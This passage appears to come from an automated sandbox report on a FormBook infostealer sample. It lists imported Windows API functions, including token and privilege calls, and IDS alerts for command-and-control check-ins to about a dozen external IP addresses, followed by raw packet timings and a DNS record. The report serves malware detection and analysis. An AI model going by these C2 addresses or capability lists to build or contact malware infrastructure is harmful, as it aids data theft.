ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
GDI32.dll | DeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
OLEAUT32.dll | SafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, OleLoadPicture, SafeArrayGetVartype, SafeArrayDestroyData, SafeArrayAccessData, VarR8FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, SafeArrayDestroyDescriptor, LoadRegTypeLib, GetActiveObject, SafeArrayUnaccessData
Language of compilation system | Country where language is spoken
English | Great Britain
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-07T10:38:24.034900+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 49976 | 76.223.105.230 | 80 | TCP
2024-10-07T10:38:40.234348+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49977 | 65.21.196.90 | 80 | TCP
2024-10-07T10:38:42.784111+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49978 | 65.21.196.90 | 80 | TCP
2024-10-07T10:38:45.357708+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49979 | 65.21.196.90 | 80 | TCP
2024-10-07T10:38:48.458941+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 49980 | 65.21.196.90 | 80 | TCP
2024-10-07T10:38:54.248351+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49981 | 162.0.238.246 | 80 | TCP
2024-10-07T10:38:57.755804+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49982 | 162.0.238.246 | 80 | TCP
2024-10-07T10:38:59.405237+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49983 | 162.0.238.246 | 80 | TCP
2024-10-07T10:39:02.300481+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 49984 | 162.0.238.246 | 80 | TCP
2024-10-07T10:39:10.093055+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49985 | 46.17.172.49 | 80 | TCP
2024-10-07T10:39:12.676381+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49986 | 46.17.172.49 | 80 | TCP
2024-10-07T10:39:15.263845+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49987 | 46.17.172.49 | 80 | TCP
2024-10-07T10:39:17.791894+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 49988 | 46.17.172.49 | 80 | TCP
2024-10-07T10:39:23.554267+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49989 | 62.149.128.40 | 80 | TCP
2024-10-07T10:39:26.122566+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49990 | 62.149.128.40 | 80 | TCP
2024-10-07T10:39:28.656511+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49991 | 62.149.128.40 | 80 | TCP
2024-10-07T10:39:31.200575+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 49992 | 62.149.128.40 | 80 | TCP
2024-10-07T10:39:45.159373+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49993 | 45.130.41.13 | 80 | TCP
2024-10-07T10:39:47.713671+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49994 | 45.130.41.13 | 80 | TCP
2024-10-07T10:39:50.288138+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49995 | 45.130.41.13 | 80 | TCP
2024-10-07T10:39:52.808450+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 49996 | 45.130.41.13 | 80 | TCP
2024-10-07T10:39:59.396243+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49997 | 3.33.130.190 | 80 | TCP
2024-10-07T10:40:00.896362+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49998 | 3.33.130.190 | 80 | TCP
2024-10-07T10:40:04.423030+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49999 | 3.33.130.190 | 80 | TCP
2024-10-07T10:40:08.997373+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 50000 | 3.33.130.190 | 80 | TCP
2024-10-07T10:40:18.911820+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 50001 | 203.175.9.128 | 80 | TCP
2024-10-07T10:40:21.459216+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 50002 | 203.175.9.128 | 80 | TCP
2024-10-07T10:40:24.005624+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 50003 | 203.175.9.128 | 80 | TCP
2024-10-07T10:40:26.456468+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 50004 | 203.175.9.128 | 80 | TCP
2024-10-07T10:40:32.606531+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 50005 | 38.47.233.65 | 80 | TCP
2024-10-07T10:40:35.345060+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 50006 | 38.47.233.65 | 80 | TCP
2024-10-07T10:40:37.913354+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 50007 | 38.47.233.65 | 80 | TCP
2024-10-07T10:40:40.524385+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 50008 | 38.47.233.65 | 80 | TCP
2024-10-07T10:40:47.083973+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 50009 | 172.81.61.224 | 80 | TCP
2024-10-07T10:40:49.630667+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 50010 | 172.81.61.224 | 80 | TCP
2024-10-07T10:40:52.177647+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 50011 | 172.81.61.224 | 80 | TCP
2024-10-07T10:41:14.589098+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 50012 | 172.81.61.224 | 80 | TCP
2024-10-07T10:41:20.404455+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 50013 | 194.58.112.174 | 80 | TCP
2024-10-07T10:41:22.943302+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 50014 | 194.58.112.174 | 80 | TCP
2024-10-07T10:41:25.484237+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 50015 | 194.58.112.174 | 80 | TCP
2024-10-07T10:41:28.052429+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 50016 | 194.58.112.174 | 80 | TCP
2024-10-07T10:41:36.640485+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 50017 | 3.33.130.190 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                  Oct 7, 2024 10:38:59.405152082 CEST8049983162.0.238.246192.168.2.10
                                                                  Oct 7, 2024 10:38:59.405167103 CEST8049983162.0.238.246192.168.2.10
                                                                  Oct 7, 2024 10:38:59.405236959 CEST4998380192.168.2.10162.0.238.246
                                                                  Oct 7, 2024 10:39:00.302438974 CEST4998380192.168.2.10162.0.238.246
                                                                  Oct 7, 2024 10:39:01.321463108 CEST4998480192.168.2.10162.0.238.246
                                                                  Oct 7, 2024 10:39:01.677294016 CEST8049984162.0.238.246192.168.2.10
                                                                  Oct 7, 2024 10:39:01.677436113 CEST4998480192.168.2.10162.0.238.246
                                                                  Oct 7, 2024 10:39:01.684482098 CEST4998480192.168.2.10162.0.238.246
                                                                  Oct 7, 2024 10:39:01.690279007 CEST8049984162.0.238.246192.168.2.10
                                                                  Oct 7, 2024 10:39:02.300024033 CEST8049984162.0.238.246192.168.2.10
                                                                  Oct 7, 2024 10:39:02.300406933 CEST8049984162.0.238.246192.168.2.10
                                                                  Oct 7, 2024 10:39:02.300481081 CEST4998480192.168.2.10162.0.238.246
                                                                  Oct 7, 2024 10:39:02.305731058 CEST4998480192.168.2.10162.0.238.246
                                                                  Oct 7, 2024 10:39:02.310748100 CEST8049984162.0.238.246192.168.2.10
                                                                  Oct 7, 2024 10:39:09.163688898 CEST4998580192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:09.168589115 CEST804998546.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:09.168720007 CEST4998580192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:09.179605007 CEST4998580192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:09.184583902 CEST804998546.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:10.092828035 CEST804998546.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:10.092852116 CEST804998546.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:10.093055010 CEST4998580192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:10.093075037 CEST804998546.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:10.093116045 CEST4998580192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:10.692924023 CEST4998580192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:11.712136030 CEST4998680192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:11.717128992 CEST804998646.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:11.717283010 CEST4998680192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:11.728627920 CEST4998680192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:11.733515978 CEST804998646.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:12.676270008 CEST804998646.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:12.676295996 CEST804998646.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:12.676381111 CEST4998680192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:12.677231073 CEST804998646.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:12.677283049 CEST4998680192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:13.285190105 CEST4998680192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:14.295459032 CEST4998780192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:14.300431967 CEST804998746.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:14.300534010 CEST4998780192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:14.311151028 CEST4998780192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:14.316235065 CEST804998746.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:14.316601992 CEST804998746.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:15.263647079 CEST804998746.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:15.263684034 CEST804998746.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:15.263844967 CEST4998780192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:15.265903950 CEST804998746.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:15.265959024 CEST4998780192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:15.828962088 CEST4998780192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:16.836874962 CEST4998880192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:16.841835976 CEST804998846.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:16.841984034 CEST4998880192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:16.850478888 CEST4998880192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:16.855271101 CEST804998846.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:17.791733980 CEST804998846.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:17.791762114 CEST804998846.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:17.791893959 CEST4998880192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:17.792633057 CEST804998846.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:17.792680025 CEST4998880192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:17.795090914 CEST4998880192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:17.799935102 CEST804998846.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:22.880143881 CEST4998980192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:22.885035992 CEST804998962.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:22.885149002 CEST4998980192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:22.895766020 CEST4998980192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:22.900583982 CEST804998962.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:23.554140091 CEST804998962.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:23.554162025 CEST804998962.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:23.554178953 CEST804998962.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:23.554233074 CEST804998962.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:23.554246902 CEST804998962.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:23.554266930 CEST4998980192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:23.554266930 CEST4998980192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:23.554672956 CEST804998962.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:23.554747105 CEST4998980192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:24.412009001 CEST4998980192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:25.432187080 CEST4999080192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:25.437268972 CEST804999062.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:25.437336922 CEST4999080192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:25.454433918 CEST4999080192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:25.459429979 CEST804999062.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:26.122329950 CEST804999062.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:26.122383118 CEST804999062.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:26.122414112 CEST804999062.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:26.122431040 CEST804999062.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:26.122438908 CEST804999062.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:26.122453928 CEST804999062.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:26.122565985 CEST4999080192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:26.122565985 CEST4999080192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:26.958595037 CEST4999080192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:27.977508068 CEST4999180192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:27.982330084 CEST804999162.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:27.982398987 CEST4999180192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:27.993264914 CEST4999180192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:27.998598099 CEST804999162.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:27.998650074 CEST804999162.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:28.656227112 CEST804999162.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:28.656358957 CEST804999162.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:28.656414032 CEST804999162.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:28.656450033 CEST804999162.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:28.656480074 CEST804999162.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:28.656511068 CEST4999180192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:28.656511068 CEST4999180192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:28.656646967 CEST804999162.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:28.658296108 CEST4999180192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:29.513932943 CEST4999180192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:30.524652958 CEST4999280192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:30.529565096 CEST804999262.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:30.531305075 CEST4999280192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:30.538971901 CEST4999280192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:30.543828964 CEST804999262.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:31.200469017 CEST804999262.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:31.200494051 CEST804999262.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:31.200505972 CEST804999262.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:31.200575113 CEST4999280192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:31.200651884 CEST804999262.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:31.200666904 CEST804999262.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:31.200689077 CEST804999262.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:31.200742006 CEST4999280192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:31.200773001 CEST4999280192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:31.205507994 CEST4999280192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:31.210371017 CEST804999262.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:44.412945986 CEST4999380192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:44.417846918 CEST804999345.130.41.13192.168.2.10
                                                                  Oct 7, 2024 10:39:44.418541908 CEST4999380192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:44.430542946 CEST4999380192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:44.435609102 CEST804999345.130.41.13192.168.2.10
                                                                  Oct 7, 2024 10:39:45.159245014 CEST804999345.130.41.13192.168.2.10
                                                                  Oct 7, 2024 10:39:45.159326077 CEST804999345.130.41.13192.168.2.10
                                                                  Oct 7, 2024 10:39:45.159373045 CEST4999380192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:45.943023920 CEST4999380192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:46.964231014 CEST4999480192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:46.969191074 CEST804999445.130.41.13192.168.2.10
                                                                  Oct 7, 2024 10:39:46.969291925 CEST4999480192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:46.980232954 CEST4999480192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:46.985048056 CEST804999445.130.41.13192.168.2.10
                                                                  Oct 7, 2024 10:39:47.713430882 CEST804999445.130.41.13192.168.2.10
                                                                  Oct 7, 2024 10:39:47.713583946 CEST804999445.130.41.13192.168.2.10
                                                                  Oct 7, 2024 10:39:47.713670969 CEST4999480192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:48.492248058 CEST4999480192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:49.509219885 CEST4999580192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:49.516606092 CEST804999545.130.41.13192.168.2.10
                                                                  Oct 7, 2024 10:39:49.516696930 CEST4999580192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:49.531136036 CEST4999580192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:49.537883043 CEST804999545.130.41.13192.168.2.10
                                                                  Oct 7, 2024 10:39:49.538444996 CEST804999545.130.41.13192.168.2.10
                                                                  Oct 7, 2024 10:39:50.287682056 CEST804999545.130.41.13192.168.2.10
                                                                  Oct 7, 2024 10:39:50.287939072 CEST804999545.130.41.13192.168.2.10
                                                                  Oct 7, 2024 10:39:50.288137913 CEST4999580192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:51.036819935 CEST4999580192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:52.056494951 CEST4999680192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:52.061886072 CEST804999645.130.41.13192.168.2.10
                                                                  Oct 7, 2024 10:39:52.061964989 CEST4999680192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:52.071204901 CEST4999680192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:52.076148033 CEST804999645.130.41.13192.168.2.10
                                                                  Oct 7, 2024 10:39:52.807353973 CEST804999645.130.41.13192.168.2.10
                                                                  Oct 7, 2024 10:39:52.807512999 CEST804999645.130.41.13192.168.2.10
                                                                  Oct 7, 2024 10:39:52.808449984 CEST4999680192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:52.812253952 CEST4999680192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:52.817133904 CEST804999645.130.41.13192.168.2.10
                                                                  Oct 7, 2024 10:39:57.870446920 CEST4999780192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:39:57.875438929 CEST80499973.33.130.190192.168.2.10
                                                                  Oct 7, 2024 10:39:57.875509977 CEST4999780192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:39:57.890269041 CEST4999780192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:39:57.895126104 CEST80499973.33.130.190192.168.2.10
                                                                  Oct 7, 2024 10:39:59.396243095 CEST4999780192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:39:59.401664972 CEST80499973.33.130.190192.168.2.10
                                                                  Oct 7, 2024 10:39:59.401716948 CEST4999780192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:40:00.423063993 CEST4999880192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:40:00.428167105 CEST80499983.33.130.190192.168.2.10
                                                                  Oct 7, 2024 10:40:00.428261995 CEST4999880192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:40:00.460304976 CEST4999880192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:40:00.465332031 CEST80499983.33.130.190192.168.2.10
                                                                  Oct 7, 2024 10:40:00.895008087 CEST80499983.33.130.190192.168.2.10
                                                                  Oct 7, 2024 10:40:00.896362066 CEST4999880192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:40:01.974647045 CEST4999880192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:40:01.979671001 CEST80499983.33.130.190192.168.2.10
                                                                  Oct 7, 2024 10:40:03.030570030 CEST4999980192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:40:03.035563946 CEST80499993.33.130.190192.168.2.10
                                                                  Oct 7, 2024 10:40:03.040929079 CEST4999980192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:40:03.056168079 CEST4999980192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:40:03.061081886 CEST80499993.33.130.190192.168.2.10
                                                                  Oct 7, 2024 10:40:03.061335087 CEST80499993.33.130.190192.168.2.10
                                                                  Oct 7, 2024 10:40:04.422934055 CEST80499993.33.130.190192.168.2.10
                                                                  Oct 7, 2024 10:40:04.423029900 CEST4999980192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:40:04.570954084 CEST4999980192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:40:04.575786114 CEST80499993.33.130.190192.168.2.10
                                                                  Oct 7, 2024 10:40:05.586980104 CEST5000080192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:40:05.592072010 CEST80500003.33.130.190192.168.2.10
                                                                  Oct 7, 2024 10:40:05.592152119 CEST5000080192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:40:05.600244045 CEST5000080192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:40:05.605137110 CEST80500003.33.130.190192.168.2.10
                                                                  Oct 7, 2024 10:40:08.992609978 CEST80500003.33.130.190192.168.2.10
                                                                  Oct 7, 2024 10:40:08.992640018 CEST80500003.33.130.190192.168.2.10
                                                                  Oct 7, 2024 10:40:08.997373104 CEST5000080192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:40:08.997374058 CEST5000080192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:40:09.002305984 CEST80500003.33.130.190192.168.2.10
                                                                  Oct 7, 2024 10:40:17.380774021 CEST5000180192.168.2.10203.175.9.128
                                                                  Oct 7, 2024 10:40:17.385936022 CEST8050001203.175.9.128192.168.2.10
                                                                  Oct 7, 2024 10:40:17.386049986 CEST5000180192.168.2.10203.175.9.128
                                                                  Oct 7, 2024 10:40:17.397810936 CEST5000180192.168.2.10203.175.9.128
                                                                  Oct 7, 2024 10:40:17.402753115 CEST8050001203.175.9.128192.168.2.10
                                                                  Oct 7, 2024 10:40:18.911819935 CEST5000180192.168.2.10203.175.9.128
                                                                  Oct 7, 2024 10:40:19.224251986 CEST5000180192.168.2.10203.175.9.128
                                                                  Oct 7, 2024 10:40:19.550646067 CEST8050001203.175.9.128192.168.2.10
                                                                  Oct 7, 2024 10:40:19.930846930 CEST5000280192.168.2.10203.175.9.128
                                                                  Oct 7, 2024 10:40:19.935879946 CEST8050002203.175.9.128192.168.2.10
                                                                  Oct 7, 2024 10:40:19.936031103 CEST5000280192.168.2.10203.175.9.128
                                                                  Oct 7, 2024 10:40:19.947967052 CEST5000280192.168.2.10203.175.9.128
                                                                  Oct 7, 2024 10:40:19.952989101 CEST8050002203.175.9.128192.168.2.10
                                                                  Oct 7, 2024 10:40:20.994896889 CEST8050001203.175.9.128192.168.2.10
                                                                  Oct 7, 2024 10:41:35.253551006 CEST1.1.1.1192.168.2.100x4fbeNo error (0)www.platinumkitchens.infoplatinumkitchens.infoCNAME (Canonical name)IN (0x0001)false
